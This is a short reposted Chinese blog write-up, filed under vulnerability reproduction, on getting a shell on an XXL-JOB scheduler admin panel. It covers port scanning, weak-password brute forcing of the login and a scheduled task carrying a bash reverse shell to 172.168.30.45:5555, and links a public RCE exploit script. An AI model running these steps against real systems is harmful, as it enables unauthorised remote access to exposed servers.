码上快乐

相关内容   简体   繁体

XXL-JOB(任务调度中心)-反弹getshell

本文转载自  查看原文  2021-01-21 21:52  439    漏洞复现/ 靶场实战

XXL-JOB(任务调度中心)-反弹getshell

常规扫描

image-20210121214518178

端口扫描扫出来9999 百度得出是xxl-job服务并爆出后台默认路径

http://172.168.83.36:8080/xxl-job-admin/jobinfo

image-20210121214145057

后台登录没有验证码 尝试爆破一下弱口令

image-20210121214852256

添加定时任务

image-20210121205831919

bash反弹命令

/bin/bash -i >& /dev/tcp/172.168.30.45/5555 0>&1

image-20210121210632122

命令执行不成功 bash会话并没有反弹

下载漏洞exp

image-20210121215348959

python3 E:\xxl-job-rce-main\xxl-job-rce exe-code.py

image-20210121213936458

成功反弹

image-20210121214000399

参考

[1] https://github.com/mrknow001/xxl-job-rce

[2] https://www.cnblogs.com/kbhome/p/13210394.html


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 XXL-JOB(任务调度中心)-反弹getshell linux下部署XXL-JOB任务调度中心 XXL-JOB任务调度 xxl-job 调度中心如何进行进行任务调度 Spring boot下,集成任务调度中心(XXL-JOB) 任务调度中心xxl-job对外接口使用 xxl-job定时任务调度中心基础简介理解 分布式任务调度系统xxl-job源码探究(二、服务中心) XXL-Job分布式任务调度 分布式任务调度系统:xxl-job
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM